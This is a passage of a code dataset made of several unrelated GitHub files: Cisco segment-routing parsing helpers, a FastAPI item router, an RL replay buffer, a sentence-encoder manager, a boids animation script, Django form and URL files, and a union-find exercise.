R(['(.*{}.*)'.format(policy),'candidate_paths',\r\n 'preference','(?P.*)',\r\n 'path_type','dynamic',\r\n 'status','(?P.*)'])\r\n dynamic = find([out], reqs, filter_=False, all_keys=True)\r\n if dynamic:\r\n keys = GroupKeys.group_keys(reqs=reqs.args, ret_num={},\r\n source=dynamic, all_keys=True)\r\n\r\n for item in keys:\r\n if item['status'] == 'active':\r\n path_index = item['preference']\r\n\r\n reqs2 = R(['(.*{}.*)'.format(policy),'candidate_paths',\r\n 'preference',path_index,\r\n 'path_type','dynamic',\r\n 'hops','(?P.*)'])\r\n hops = find([out], reqs2, filter_=False, all_keys=True)\r\n if hops:\r\n hop = hops[0][0]\r\n for value in hop.values():\r\n sid = value.get('sid', '')\r\n labels.append(str(sid))\r\n\r\n if ignore_first_label and len(labels):\r\n labels.pop(0)\r\n return labels\r\n\r\n\r\ndef get_segment_routing_policy_in_state(device, expected_admin='up', expected_oper='up',\\\r\n expected_color='', expected_endpoint=''):\r\n \"\"\" Find a segement-routing policy in expected state\r\n\r\n Args:\r\n device ('obj'): Device object\r\n expected_admin ('str'): Expected admin state\r\n expected_oper ('str'): Expected operational state\r\n expected_color (`str`): Expected 
color\r\n expected_endpoint (`str`): Expected end-point address\r\n Returns:\r\n policy ('str'): Policy name\r\n \"\"\"\r\n cmd = 'show segment-routing traffic-eng policy all'\r\n try:\r\n out = device.parse(cmd)\r\n except Exception as e:\r\n log.error(\"Failed to parse '{cmd}': {e}\".format(cmd=cmd, e=e))\r\n return None\r\n\r\n for policy in out.keys():\r\n admin = out.get(policy, {}).get('status', {}).get('admin', '')\r\n oper = out.get(policy, {}).get('status', {}).\\\r\n get('operational', {}).get('state', '')\r\n color = str(out.get(policy, {}).get('color', ''))\r\n endpoint = out.get(policy, {}).get('end_point', '')\r\n\r\n if (admin.lower() == expected_admin.lower() and \r\n oper.lower() == expected_oper.lower() and \r\n color == expected_color and \r\n endpoint == expected_endpoint):\r\n return policy\r\n else:\r\n log.info(\"Failed to find a policy with admin state {admin} \"\r\n \"and oper state {oper}\".format(admin=expected_admin,\r\n oper=expected_oper))\r\n return None\r\n\r\n\r\ndef get_segment_routing_sid_map_configuration(device, address_family=\"ipv4\"):\r\n \"\"\" Get Segment routing SID map configuration\r\n\r\n Args:\r\n device ('str'): Device str\r\n address_family ('str'): Address family\r\n Returns:\r\n Dictionary with ip address as key and sid as value\r\n ex.)\r\n {\r\n '192.168.1.1': '1',\r\n '192.168.1.2': '2'\r\n }\r\n \"\"\"\r\n out = get_running_config_section_dict(\r\n device=device, section=\"segment-routing\"\r\n )\r\n\r\n sid_dict = {}\r\n\r\n if not out:\r\n return None\r\n\r\n p1 = re.compile(r\"^(?P\\S+) index (?P\\d+) range \\d+$\")\r\n\r\n connected_prefix_sid_maps = out[\"segment-routing mpls\"][\r\n \"connected-prefix-sid-map\"\r\n ][\"address-family {}\".format(address_family)].keys()\r\n\r\n for key in connected_prefix_sid_maps:\r\n key = key.strip()\r\n m = p1.match(key)\r\n if m:\r\n group = m.groupdict()\r\n sid_dict.update({group[\"ip_address\"]: group[\"sid\"]})\r\n continue\r\n\r\n return sid_dict\r\n\r\n\r\ndef get_segment_routing_lb_range(device):\r\n \"\"\" Gets segement-routing local block range\r\n\r\n Args:\r\n device ('obj'): device to use\r\n\r\n Returns:\r\n ('int', 'int'): label_min, label_max\r\n\r\n Raises:\r\n N/A\r\n \"\"\"\r\n try:\r\n out = device.parse(\"show segment-routing mpls lb\")\r\n except SchemaEmptyParserError:\r\n return None, None\r\n\r\n return out.get(\"label_min\"), out.get(\"label_max\")\r\n\r\n\r\ndef get_segment_routing_gb_range(device):\r\n \"\"\" Gets segement-routing global block range\r\n\r\n Args:\r\n device ('obj'): device to use\r\n\r\n Returns:\r\n ('int', 'int'): label_min, label_max\r\n\r\n Raises:\r\n None\r\n \"\"\"\r\n try:\r\n out = device.parse(\"show segment-routing mpls gb\")\r\n except SchemaEmptyParserError:\r\n return None, None\r\n\r\n return out.get(\"label_min\"), out.get(\"label_max\")\r\n\r\ndef get_segment_routing_accumulated_path_metric(device, preference, policy_name=None):\r\n \"\"\" Get accumulated path metric for a preference path\r\n\r\n Args:\r\n device ('obj'): Device to use\r\n policy_name ('str'): Policy name to verify. 
If not specified will verify all\r\n preference ('int'): Preference path\r\n\r\n Returns:\r\n accumulated_metric (None, 'int'): Accumulated path metric\r\n\r\n Raises:\r\n N/A\r\n \"\"\"\r\n if policy_name:\r\n cmd = 'show segment-routing traffic-eng policy name {policy}'.format(policy=policy_name)\r\n else:\r\n cmd = 'show segment-routing traffic-eng policy all'\r\n \r\n try:\r\n out = device.parse(cmd)\r\n except SchemaEmptyParserError:\r\n return None\r\n \r\n for policy in out:\r\n for preference_found in out[policy].get('candidate_paths', {}).get('preference', {}):\r\n if preference != preference_found:\r\n continue\r\n if out[policy]['candidate_paths']['preference'][preference].get('path_type'):\r\n path_type_dict = out[policy]['candidate_paths']['preference'][preference]['path_type']\r\n if 'dynamic' in path_type_dict:\r\n accumulated_metric = path_type_dict['dynamic'].get('path_accumulated_metric', '')\r\n return accumulated_metric\r\n return None\r\n\r\ndef get_segment_routing_labels_from_bgp(device, route, vrf, best_path=False):\r\n \"\"\" Gets segement-routing labels from bgp table\r\n\r\n Args:\r\n device (`obj`): device to use\r\n route (`str`): route to check\r\n vrf (`vrf`): VRF name\r\n best_path (`bool`): only best path returned\r\n\r\n Returns:\r\n ('list'): list of segment routing labels\r\n\r\n Raises:\r\n N/A\r\n \"\"\"\r\n\r\n # search destination's endpoint and color by \r\n # show ip bgp vpnv4 vrf \r\n\r\n endpoint_color_list = device.api.get_ip_bgp_route_nexthop_color(\r\n address_family='vpnv4', route=route, vrf=vrf, best_path=True)\r\n \r\n # get policy names based on endpoint and color\r\n policy_list = []\r\n label_list = []\r\n if endpoint_color_list:\r\n log.info('Found endpoint and color: {}'.format(\r\n endpoint_color_list))\r\n for endpoint, color in endpoint_color_list:\r\n policy = device.api.get_segment_routing_policy_in_state(\r\n expected_admin='up', expected_oper='up',\r\n expected_color=color, expected_endpoint=endpoint)\r\n # don't have redundant policy\r\n if policy not in policy_list:\r\n policy_list.append(policy)\r\n if policy_list:\r\n log.info('Policy Found: {}'.format(policy_list))\r\n for policy in policy_list:\r\n label_list = device.api.\\\r\n get_segment_routing_policy_active_path_hop_labels(\r\n policy=policy, ignore_first_label=True)\r\n\r\n return label_list\r\n","repo_name":"CiscoTestAutomation/genielibs","sub_path":"pkgs/sdk-pkg/src/genie/libs/sdk/apis/iosxe/segment_routing/get.py","file_name":"get.py","file_ext":"py","file_size_in_byte":10585,"program_lang":"python","lang":"en","doc_type":"code","stars":98,"dataset":"github-code","pt":"16"}
+{"seq_id":"14500229895","text":"\"\"\"\nItem routes\n\"\"\"\n\nfrom fastapi import APIRouter, Depends, HTTPException\nfrom sqlalchemy.orm import Session\n\nfrom app.schemas.item import ItemSchema, ItemCreateSchema, ItemUpdateSchema\nfrom app.api.v1.dependencies import get_db\nfrom app.crud import item as crud\n\n\nrouter = APIRouter()\n\n\n@router.get('/', response_model=list[ItemSchema])\ndef read_all(db: Session = Depends(get_db)):\n \"\"\"Read items\"\"\"\n return crud.get_items(db)\n\n\n@router.get('/{item_id}', response_model=ItemSchema)\ndef read_one(item_id: int, db: Session = Depends(get_db)):\n \"\"\"Get item by id\"\"\"\n item = crud.get_item_by_id(item_id=item_id, db=db)\n if item is None:\n raise HTTPException(status_code=404)\n else:\n return item\n\n\n@router.put('/{item_id}', response_model=ItemSchema)\ndef update(item_id: int, item: ItemUpdateSchema, db: Session = Depends(get_db)):\n \"\"\"Update item\"\"\"\n item = crud.update_item(db, item_id, item)\n if item is None:\n raise HTTPException(status_code=404)\n else:\n return item\n\n\n@router.post('/', response_model=ItemSchema)\ndef create(item: ItemCreateSchema, db: Session = Depends(get_db)):\n \"\"\"Create new item\"\"\"\n return crud.create_item(db, item)\n\n\n@router.delete('/{item_id}')\ndef delete(item_id: int, db: Session = Depends(get_db)):\n \"\"\"Delete item\"\"\"\n response = crud.disable_item(db, item_id)\n if response is None:\n raise HTTPException(status_code=404)\n","repo_name":"beerman17/dragonroll-gameserver","sub_path":"app/api/v1/endpoints/items.py","file_name":"items.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"6067989024","text":"import json\nimport logging\nimport os\nimport numpy as np\n\nfrom gym.utils import atomic_write\nfrom rltf.utils import rltf_conf\nfrom rltf.utils import seeding\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass BaseBuffer():\n \"\"\"Abstract buffer that saves agent experience. Supports both image and low-dimensional observations.\n Very memory efficient implementation in the case of images.\"\"\"\n\n def __init__(self, size, state_shape, obs_dtype, act_shape, act_dtype, obs_len):\n \"\"\"\n Args:\n state_shape: tuple or list. Shape of what is consedered to be a single state (not observation).\n For example, for DQN this should be `[84, 84, 4]` because a state is comprised of the last 4\n frames (observations).\n obs_dtype: np.dtype. Type of the observation data\n act_shape: tuple or list. Shape of the action space\n act_dtype: np.dtype. Type of the action data\n obs_len: int, `>= 1`. The number of observations that comprise a state. If `obs_len=1`,\n then `obs_shape == state_shape`. Must equal 1 for low-dimensional observations.\n If `obs_len>=1`, then observations must be images. In this case, states are comprised of\n stacked consecutive observations (images) and `obs_shape[-1] == state_shape[-1] / obs_len`.\n In this case the buffer stores observations separately and automatically reconstructs the\n full states when queried. Corresponds to the order of the MDP.\n \"\"\"\n\n # Compute the observation shape\n obs_shape = self._get_obs_shape(state_shape, obs_len, obs_dtype)\n\n self.obs_shape = list(obs_shape) # observation shape (NOT state shape!)\n self.act_shape = list(act_shape)\n self.obs_len = obs_len\n\n self.max_size = int(size)\n self.size_now = 0\n self.next_idx = 0\n # self.new_idx = 0\n\n # Create the buffers\n self.obs = np.empty([self.max_size] + self.obs_shape, dtype=obs_dtype)\n self.action = np.empty([self.max_size] + self.act_shape, dtype=act_dtype)\n self.reward = np.empty([self.max_size], dtype=np.float32)\n self.done = np.empty([self.max_size], dtype=np.bool)\n\n self.prng = seeding.get_prng()\n\n\n @staticmethod\n def _get_obs_shape(state_shape, obs_len, obs_dtype):\n \"\"\"Compute the shape of a single observation (not state)\"\"\"\n\n assert isinstance(obs_len, int) and obs_len >= 1\n\n # Only image observations support stacking observations\n if obs_len > 1:\n assert len(state_shape) == 3\n # Make sure that the type of the observation is np.uint8 for images\n if len(state_shape) == 3:\n assert obs_dtype == np.uint8\n\n # Images assume that the last dimension of the shape is the channel dimension\n if obs_len > 1 and len(state_shape) == 3:\n assert state_shape[-1] % obs_len == 0\n obs_shape = list(state_shape)\n obs_shape[-1] = int(obs_shape[-1]/obs_len)\n else:\n obs_shape = state_shape\n\n return obs_shape\n\n\n def store(self, obs_t, act_t, rew_tp1, done_tp1):\n \"\"\"Store an observed transition. If `obs_len>1`, the next call to this function must be with\n the observation after taking `act_t`, otherwise, reconstructed state will be incorrect.\n If `done_tp1 == True`, then `store()` should not be called with `obs_tp1`, since the agent\n does not need it for computing the return\n Args:\n obs_t: `np.array`, of shape `state_shape`. If `obs_len>1`, the observation is automatically\n extracted and stored instead of storing duplicate data.\n act_t: `np.array`, of shape `act_shape` or `float`. Action taken when `obs_t` was observed\n reward_tp1: `float`. Reward obtained on executing `act_t` in state `obs_t`\n done_tp1: `bool`. 
True if episode terminated on executing `act_t` in state `obs_t`.\n \"\"\"\n\n # To avoid storing the same data several times, if obs_len > 1, then store only the last\n # observation from the stack of observations that comprise a state\n if self.obs_len > 1:\n self.obs[self.next_idx] = obs_t[:, :, -self.obs_shape[-1]:]\n else:\n self.obs[self.next_idx] = obs_t\n\n self.action[self.next_idx] = act_t\n self.reward[self.next_idx] = rew_tp1\n self.done[self.next_idx] = done_tp1\n\n self.next_idx = (self.next_idx + 1) % self.max_size\n self.size_now = min(self.max_size, self.size_now + 1)\n\n\n def _encode_img_observation(self, idx):\n \"\"\"Encode the observation for idx by stacking the `obs_len` preceding frames together.\n Assume there are more than `obs_len` frames in the buffer.\n NOTE: Used only for image observations\n \"\"\"\n hi = idx + 1 # make noninclusive\n lo = hi - self.obs_len\n\n for i in range(lo, hi - 1):\n if self.done[i % self.max_size]:\n lo = i + 1\n missing = self.obs_len - (hi - lo)\n\n # We need to duplicate the lo observation\n if missing > 0:\n frames = [self.obs[lo % self.max_size] for _ in range(missing)]\n for i in range(lo, hi):\n frames.append(self.obs[i % self.max_size])\n return np.concatenate(frames, 2)\n # We are on the boundary of the buffer\n elif lo < 0:\n img_h, img_w = self.obs.shape[1], self.obs.shape[2]\n frames = [self.obs[lo:], self.obs[:hi]]\n frames = np.concatenate(frames, 0)\n return frames.transpose(1, 2, 0, 3).reshape(img_h, img_w, -1)\n # The standard case\n else:\n # This optimization can save about 30% compute time\n img_h, img_w = self.obs.shape[1], self.obs.shape[2]\n return self.obs[lo:hi].transpose(1, 2, 0, 3).reshape(img_h, img_w, -1)\n\n\n def sample(self, batch_size):\n raise NotImplementedError()\n\n\n def new_data(self, batch_size=32):\n \"\"\"Yields the new data which was stored since the last call to this function.\n Args:\n batch_size: int. Size of a single yielded batch. Can be smaller than specified if not enough data\n Returns:\n python generator; has the same signature as `sample()`\n \"\"\"\n raise NotImplementedError()\n\n\n def all_data(self, batch_size=32):\n \"\"\"Yields all data in the buffer\n Args:\n batch_size: int. Size of a single yielded batch. Can be smaller than specified if not enough data\n Returns:\n python generator which should be iterated; has the same signature as `sample()`\n \"\"\"\n raise NotImplementedError()\n\n\n def recent_data(self, size, batch_size=32):\n \"\"\"Yields the most recent `size` number of examples in the buffer\n Args:\n size: int. Total number of data points to generate\n batch_size: int. Size of a single yielded batch. 
Can be smaller than specified if not enough data\n Returns:\n python generator which should be iterated; has the same signature as `sample()`\n \"\"\"\n raise NotImplementedError()\n\n\n def save(self, model_dir):\n \"\"\"Store the data to disk\n Args:\n model_dir: Full path of the directory to save the buffer\n \"\"\"\n save_dir = os.path.join(model_dir, \"buffer\")\n state_file = os.path.join(save_dir, \"state.json\")\n\n if not os.path.exists(save_dir):\n # Create symlink to store buffer if $RLTFBUF is defined\n if 'RLTFBUF' in os.environ:\n # split = os.path.split(os.path.normpath(model_dir))\n # envdir = split[1]\n # model = os.path.split(split[0])\n # store_dir = os.path.join(os.environ['RLTFBUF'], os.path.join(model, envdir))\n mdir = os.path.relpath(model_dir, rltf_conf.MODELS_DIR)\n store_dir = os.path.join(os.environ['RLTFBUF'], mdir)\n\n store_dir = os.path.join(store_dir, \"buffer\")\n if not os.path.exists(store_dir):\n os.makedirs(store_dir)\n os.symlink(store_dir, save_dir)\n # Store the buffer directly in the folder\n else:\n os.makedirs(save_dir)\n\n np.save(os.path.join(save_dir, \"obs.npy\"), self.obs[:self.size_now])\n np.save(os.path.join(save_dir, \"act.npy\"), self.action[:self.size_now])\n np.save(os.path.join(save_dir, \"rew.npy\"), self.reward[:self.size_now])\n np.save(os.path.join(save_dir, \"done.npy\"), self.done[:self.size_now])\n\n data = {\n \"size_now\": self.size_now,\n \"next_idx\": self.next_idx,\n # \"new_idx\": self.new_idx,\n }\n\n with atomic_write.atomic_write(state_file) as f:\n json.dump(data, f, indent=4, sort_keys=True)\n\n\n def restore(self, model_dir):\n \"\"\"Populate the buffer from data previously saved to disk\n Args:\n model_dir: Full path of the directory of the data\n \"\"\"\n save_dir = os.path.join(model_dir, \"buffer\")\n state_file = os.path.join(save_dir, \"state.json\")\n\n if not os.path.exists(save_dir):\n return logger.warning(\"BaseBuffer not saved and cannot resume. Continuing with empty buffer.\")\n\n with open(state_file, 'r') as f:\n data = json.load(f)\n\n self.size_now = data[\"size_now\"]\n self.next_idx = data[\"next_idx\"]\n # self.new_idx = data[\"new_idx\"]\n\n obs = np.load(os.path.join(save_dir, \"obs.npy\"))\n action = np.load(os.path.join(save_dir, \"act.npy\"))\n done = np.load(os.path.join(save_dir, \"done.npy\"))\n reward = np.load(os.path.join(save_dir, \"rew.npy\"))\n\n assert len(obs) == len(action) == len(reward) == len(done) == self.size_now\n assert self.obs.shape[1:] == obs.shape[1:]\n assert self.action.shape[1:] == action.shape[1:]\n assert self.reward.shape[1:] == reward.shape[1:]\n assert self.done.shape[1:] == done.shape[1:]\n\n self.obs[:self.size_now] = obs\n self.action[:self.size_now] = action\n self.reward[:self.size_now] = reward\n self.done[:self.size_now] = done\n\n\n def _sample_n_unique(self, n, lo, hi, exclude=None):\n \"\"\"Sample n unique indices in the range [lo, hi), making sure no sample appreas in `exclude`\n Args:\n n: int. Number of samples to take\n lo: int. Lower boundary of the sample range; inclusive\n hi: int. Upper boundary of the sample range; exclusive\n exclude: list or np.array. 
Contains values that samples must not take\n Returns:\n np.array of the sampled indices\n \"\"\"\n\n batch = np.empty(n, dtype=np.uint32)\n k = 0\n\n while k < n:\n samples = self.prng.randint(lo, hi, n-k)\n # Get only the unique entries\n samples = np.unique(samples)\n # Get only the entries which are not in exclude\n if exclude is not None:\n valid = np.all(samples[:, None] != exclude, axis=-1)\n samples = samples[valid]\n # Update batch\n end = min(k + samples.shape[0], n)\n batch[k:end] = samples\n k = end\n\n return batch\n\n\n def reset(self):\n self.size_now = 0\n self.next_idx = 0\n # self.new_idx = 0\n\n\n @property\n def size(self):\n return self.max_size\n\n\n def __len__(self):\n return self.size_now\n","repo_name":"nikonikolov/rltf","sub_path":"rltf/memory/base_buffer.py","file_name":"base_buffer.py","file_ext":"py","file_size_in_byte":10664,"program_lang":"python","lang":"en","doc_type":"code","stars":81,"dataset":"github-code","pt":"16"}
+{"seq_id":"7421855452","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nimport tensorflow as tf\n\nimport s2v_encoder\n\nFLAGS = tf.flags.FLAGS\n\n\nclass EncoderManager(object):\n \"\"\"Manager class for loading and encoding with skip-thoughts models.\"\"\"\n\n def __init__(self):\n self.encoders = []\n self.sessions = []\n\n def load_model(self, model_config):\n \"\"\"Loads a skip-thoughts model.\n\n Args:\n model_config: Object containing parameters for building the model.\n vocabulary_file: Path to vocabulary file containing a list of newline-\n separated words where the word id is the corresponding 0-based index in\n the file.\n embedding_matrix_file: Path to a serialized numpy array of shape\n [vocab_size, embedding_dim].\n checkpoint_path: SkipThoughtsModel checkpoint file or a directory\n containing a checkpoint file.\n \"\"\"\n\n g = tf.Graph()\n with g.as_default():\n encoder = s2v_encoder.s2v_encoder(model_config)\n restore_model = encoder.build_graph_from_config(model_config)\n\n sess = tf.Session(graph=g)\n\n restore_model(sess)\n\n self.encoders.append(encoder)\n self.sessions.append(sess)\n\n def encode(self,\n data,\n use_norm=True,\n verbose=False,\n batch_size=128,\n use_eos=False):\n \"\"\"Encodes a sequence of sentences as skip-thought vectors.\n\n Args:\n data: A list of input strings.\n use_norm: If True, normalize output skip-thought vectors to unit L2 norm.\n verbose: Whether to log every batch.\n batch_size: Batch size for the RNN encoders.\n use_eos: If True, append the end-of-sentence word to each input sentence.\n\n Returns:\n thought_vectors: A list of numpy arrays corresponding to 'data'.\n\n Raises:\n ValueError: If called before calling load_encoder.\n \"\"\"\n if not self.encoders:\n raise ValueError(\n \"Must call load_model at least once before calling encode.\")\n\n encoded = []\n for encoder, sess in zip(self.encoders, self.sessions):\n encoded.append(\n np.array(\n encoder.encode(\n sess,\n data,\n use_norm=use_norm,\n verbose=verbose,\n batch_size=batch_size,\n use_eos=use_eos)))\n\n return np.concatenate(encoded, axis=1)\n\n def close(self):\n \"\"\"Closes the active TensorFlow Sessions.\"\"\"\n for sess in self.sessions:\n sess.close()\n","repo_name":"lajanugen/S2V","sub_path":"src/encoder_manager.py","file_name":"encoder_manager.py","file_ext":"py","file_size_in_byte":2536,"program_lang":"python","lang":"en","doc_type":"code","stars":205,"dataset":"github-code","pt":"16"}
+{"seq_id":"7130006501","text":"#!/usr/bin/env python3\n\n\"\"\"\nScript to produce visualisation of boid movement from dumped position data\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport configparser, csv, numpy as np, os, sys\n\nfrom fast_boids import quick_norm\n\nfrom boids import *\n\nif len(sys.argv) < 2:\n path = '.'\nelse:\n path = sys.argv[1]\n\nconfig = configparser.ConfigParser()\nif os.path.isdir(path):\n config.read(os.path.join(path, 'config.ini'))\n config['DEFAULT']['data_dir'] = os.path.abspath(path)\nelse:\n config.read(path)\n config['DEFAULT']['data_dir'] = os.path.abspath(os.path.dirname(path))\n\nWORLD_RADIUS = eval(config['DEFAULT']['world_radius'])\nDUMP_STATS_INTERVAL = eval(config['DEFAULT']['dump_stats_interval'])\nDT = eval(config['DEFAULT']['dt'])\n\nPREY_RADIUS = eval(config['Prey']['boid_radius'])\nPREDATOR_RADIUS = eval(config['Predator']['boid_radius'])\n\nFRAME_INTERVAL = eval(config['Visualisation']['frame_interval'])\nEVERY_NTH_FRAME = eval(config['Visualisation']['every_nth_frame'])\nSTART_AT_T = eval(config['Visualisation']['start_at_t'])\nSTOP_AT_T = eval(config['Visualisation']['stop_at_t'])\n\nDATA_DIR = config['DEFAULT']['data_dir']\n\nPLOT_MINIMUM = -1.01*WORLD_RADIUS\nPLOT_MAXIMUM = 1.01*WORLD_RADIUS\n\nfeeding_area_helper = FeedingAreaConfigurations()\nfeeding_area_config = eval(config['DEFAULT']['feeding_areas'])\nif isinstance(feeding_area_config, tuple):\n FEEDING_AREA_LOCATIONS, FEEDING_AREA_RADIUS = feeding_area_config\nelse:\n FEEDING_AREA_LOCATIONS, FEEDING_AREA_RADIUS = feeding_area_helper.get_info(\n feeding_area_config)\n\ndef animate(i, fig, ax, text,\n prey_graph, prey_quivers,\n predator_graph, predator_quivers,\n prey_pos_data, prey_vel_data,\n predator_pos_data, predator_vel_data):\n text.set_text(\"t = %d\" % (i*(DUMP_STATS_INTERVAL*DT*EVERY_NTH_FRAME)\n + START_AT_T))\n u = [u[0]/quick_norm(np.array(u)) for u in prey_vel_data[i]]\n v = [u[1]/quick_norm(np.array(u)) for u in prey_vel_data[i]]\n prey_quivers.set_offsets(prey_pos_data[i])\n prey_quivers.set_UVC(u, v)\n prey_graph.set_offsets(prey_pos_data[i])\n u = [u[0]/quick_norm(np.array(u)) for u in predator_vel_data[i]]\n v = [u[1]/quick_norm(np.array(u)) for u in predator_vel_data[i]]\n predator_quivers.set_offsets(predator_pos_data[i])\n predator_quivers.set_UVC(u, v)\n predator_graph.set_offsets(predator_pos_data[i])\n return [text, prey_graph, predator_graph]\n\ndef collect_data(csv_reader):\n frame_data = []\n i = 0\n for row in csv_reader:\n if i % EVERY_NTH_FRAME:\n i += 1\n continue\n if i*DUMP_STATS_INTERVAL*DT < START_AT_T:\n i += 1\n continue\n if i*DUMP_STATS_INTERVAL*DT > STOP_AT_T:\n break\n positions = np.array(list(map(lambda x: float(x), row)))\n num_boids = positions.size / 2\n positions = positions.reshape(num_boids, 2)\n data = []\n for boid in positions:\n data.append((boid[0], boid[1]))\n frame_data.append(data)\n i += 1\n return frame_data\n\nprey_pos_reader = csv.reader(open(os.path.join(DATA_DIR, 'prey_positions.csv')))\nprey_vel_reader = csv.reader(open(os.path.join(DATA_DIR, 'prey_velocities.csv')))\npredator_pos_reader = csv.reader(open(os.path.join(DATA_DIR, 'predator_positions.csv')))\npredator_vel_reader = csv.reader(open(os.path.join(DATA_DIR, 'predator_velocities.csv')))\n\nprey_pos_data = collect_data(prey_pos_reader)\nprey_vel_data = collect_data(prey_vel_reader)\npredator_pos_data = collect_data(predator_pos_reader)\npredator_vel_data = collect_data(predator_vel_reader)\n\nfig, ax = 
plt.subplots()\nboundary = plt.Circle((0, 0), WORLD_RADIUS, facecolor='none',\n linestyle='dashed')\nax.add_artist(boundary)\n\nfor location in FEEDING_AREA_LOCATIONS:\n feeding_plot = plt.Circle(tuple(location), FEEDING_AREA_RADIUS, facecolor='green', linestyle='dashed', alpha=0.3)\n ax.add_artist(feeding_plot)\n\ntext = ax.text(PLOT_MINIMUM+5, PLOT_MAXIMUM-20, \"\", withdash=True, fontsize=12)\n\nprey_graph = ax.scatter(100*PLOT_MINIMUM, 100*PLOT_MAXIMUM,\n 1.2*np.pi*PREY_RADIUS**2, facecolor='white', alpha=0.8,\n edgecolor='black', linewidth=1)\nprey_quivers = ax.quiver([], [], width=0.5, units='dots', scale=0.08)\npredator_graph = ax.scatter(100*PLOT_MINIMUM, 100*PLOT_MAXIMUM,\n 1.2*np.pi*PREDATOR_RADIUS**2, facecolor='red', alpha=0.8,\n edgecolor='black', linewidth=1)\npredator_quivers = ax.quiver([], [], width=0.5, units='dots', scale=0.08)\nax.set_xlim(PLOT_MINIMUM, PLOT_MAXIMUM)\nax.set_ylim(PLOT_MINIMUM, PLOT_MAXIMUM)\n\nani = animation.FuncAnimation(fig, animate, len(prey_pos_data),\n fargs=(fig, ax, text,\n prey_graph, prey_quivers,\n predator_graph, predator_quivers,\n prey_pos_data, prey_vel_data,\n predator_pos_data, predator_vel_data),\n interval=FRAME_INTERVAL,\n repeat=True)\nplt.show()\n\n","repo_name":"tsmithe/adaptive-boids","sub_path":"visualise.py","file_name":"visualise.py","file_ext":"py","file_size_in_byte":5236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"12036601375","text":"from django import forms\nfrom .models import Blog\n\n\nclass BlogForm(forms.ModelForm):\n class Meta:\n model = Blog\n fields = ('title', 'description', 'blog_pic')\n widgets = {\n\n 'title': forms.TextInput(attrs={'class': 'form-control row mb-3', 'placeholder': 'Title'}),\n 'description': forms.TextInput(attrs={'class': 'form-control row mb-3', 'placeholder': 'Description'})\n\n\n }\n\n labels = {\"title\": \"Title\", \"description\": \"Description\",\n 'blog_pic': 'Profile Picture'}\n","repo_name":"FatihG34/Second_Django_Project","sub_path":"blog/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"38098136446","text":"from django.conf.urls import patterns, include, url\nfrom django.conf.urls.i18n import i18n_patterns\nfrom django.utils.translation import ugettext_lazy as _\nfrom sitemaps import ViewSitemap\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nadmin.autodiscover()\n\nsitemaps = {\n 'views_sitemap': ViewSitemap,\n}\n\nurlpatterns = patterns('',\n# url(r'^404$', 'info.views.page_not_found', name='page_not_found'),\n # Translation\n (r'^i18n/', include('django.conf.urls.i18n')),\n (r'^sitemap\\.xml$', 'django.contrib.sitemaps.views.sitemap', {\n 'sitemaps': sitemaps,\n 'template_name': 'info/custom_sitemap.html'},),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n url(r'^admin/', include(admin.site.urls)),\n\n # Albums\n url(_(r'^albums$'), 'info.views.albums', name='albums'),\n\n # Facebook all auth\n (r'^accounts/', include('allauth.urls')),\n\n)\n\nurlpatterns += i18n_patterns('',\n url(_(r'^$'), 'info.views.home', name='home'),\n url(_(r'^bicycle-touring$'), 'info.views.bicycle_touring', name='bicycle-touring'),\n url(_(r'^boom-festival$'), 'info.views.boom_festival', name='boom-festival'),\n url(_(r'^boom-and-bike$'), 'info.views.boom_and_bike', name='boom-and-bike'),\n url(_(r'^get-there$'), 'info.views.get_there', name='get-there'),\n url(_(r'^together$'), 'info.views.together', name='together'),\n url(_(r'^get-there$'), 'info.views.get_there', name='get-there'),\n url(_(r'^city_visit/(?P.+)$'), 'info.views.city_visit', name='city_visit'),\n url(_(r'^user_checkpoints/(?P[0-9]+)$'), 'info.views.user_checkpoints', name='user_checkpoints'),\n)\n\n#urlpatterns += patterns('django.contrib.auth.views',\n# (_(r'^accounts/login/$'), 'login'),\n# (_(r'^accounts/logout/$'), 'logout'),\n#)\n\nhandler404 = 'info.views.page_not_found'\n","repo_name":"qcaron/boombike","sub_path":"boombike/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"71742442889","text":"def find(parent, x):\n if parent[x] != x:\n parent[x] = find(parent, parent[x])\n return parent[x]\n\n\ndef union(parent, a, b):\n a = find(parent, a)\n b = find(parent, b)\n\n if a < b:\n parent[b] = a\n else:\n parent[a] = b\n\nn ,m = map(int, input().split())\noperations = []\nparent = [i for i in range(m+1)]\n\nfor _ in range(m):\n oper, a, b = map(int, input().split())\n operations.append((oper, a, b))\n\n\nfor operation in operations:\n oper, a, b = operation\n if oper == 0:\n union(parent, a, b)\n if oper == 1:\n if find(parent, a) == find(parent, b):\n print(\"YES\")\n else:\n print(\"NO\")\n \n\n# 7 8\n# 0 1 3\n# 1 1 7\n# 0 7 6\n# 1 7 1\n# 0 3 7\n# 0 4 2\n# 0 1 1\n# 1 1 1","repo_name":"rbgksqkr/TIL","sub_path":"이코테/8. 그래프/ex_make_team.py","file_name":"ex_make_team.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
